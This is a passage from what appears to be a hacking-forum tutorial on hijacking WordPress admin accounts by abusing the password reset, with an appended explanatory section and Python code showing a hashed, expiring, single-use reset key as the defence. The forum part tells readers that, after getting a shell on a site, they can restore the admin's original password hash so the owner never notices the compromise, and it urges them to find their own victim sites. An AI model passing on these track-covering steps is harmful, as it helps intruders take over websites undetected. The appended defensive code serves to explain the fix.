[Image: 10.PNG]

2)
once u have shelled the website .. get the database details .. use any database connector .. go to the table .. wp_user .. and in the column wp_pass .. replace the hash with the one u got in the very beginning .. the actual hash of the admin .. now the password will be again what it was before .. as nothing happened .. admin will never know what hit 'em ..

Now .. in the latest version .. 3.4.2 .. what happens actually .. that after confirming the activation key wordpress don't let you choose a new password .. rather . it actually sends u a random password on ur Email ..
yea i know its sad .. but don't worry .. someone will definitely discover any new way to work this out ..

thank u so much for viewing this thread .. if u find any trouble doing this .. hit me on FB or MSN .. contact details in my sig .. and don't try to use it on the same website i did .. because i already f***d it .. go and get ur own ..
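The weakness this thread relies on is that the reset key sits in wp_users in a form that is directly usable at wp-login.php?action=rp, so anyone who can read the table (here via SQL injection) can complete the reset. The following added example (not WordPress code and not from the thread) shows the defensive pattern: store only a digest of a random, single-use, expiring key, so a leaked row yields nothing the reset endpoint accepts. The in-memory USERS table, the login name, the TTL and the password-hash placeholders are constructed for illustration.

```python
import hashlib
import hmac
import secrets
import time

# Constructed in-memory stand-in for a users table. Only the digest of the
# reset key is stored; the plaintext key exists solely in the e-mail sent out.
USERS = {"masaru": {"email": "user@example.invalid", "password": "OLD_HASH", "reset": None}}
RESET_TTL = 24 * 3600  # seconds a reset key stays valid


def _digest(key):
    # An unsalted fast hash is acceptable here because the key itself carries
    # 192 bits of randomness; there is nothing to brute-force or rainbow-table.
    return hashlib.sha256(key.encode()).hexdigest()


def request_reset(login, now=None):
    """Mint a reset key for `login`: return the plaintext (to be e-mailed) and
    persist only its digest together with the issue time."""
    now = time.time() if now is None else now
    key = secrets.token_urlsafe(24)
    USERS[login]["reset"] = {"digest": _digest(key), "issued": now}
    return key


def check_reset_key(login, key, now=None):
    """True only if `key` matches the stored digest and has not expired."""
    now = time.time() if now is None else now
    user = USERS.get(login)
    if user is None or user["reset"] is None:
        return False
    record = user["reset"]
    if now - record["issued"] > RESET_TTL:
        return False
    # Constant-time comparison so response timing leaks nothing about the digest.
    return hmac.compare_digest(record["digest"], _digest(key))


def consume_reset(login, key, new_password_hash, now=None):
    """Complete the reset once: set the new password hash and burn the key."""
    if not check_reset_key(login, key, now):
        return False
    USERS[login]["password"] = new_password_hash
    USERS[login]["reset"] = None   # single use: a replay of the same key fails
    return True


def leaked_db_value(login):
    """What a database read (for example through SQL injection) would expose:
    the digest, which the reset endpoint does not accept as a key."""
    record = USERS[login]["reset"]
    return None if record is None else record["digest"]
```

Compare with the thread: because the table holds a digest rather than the key, the value pulled out with the UNION query cannot be pasted into the reset URL.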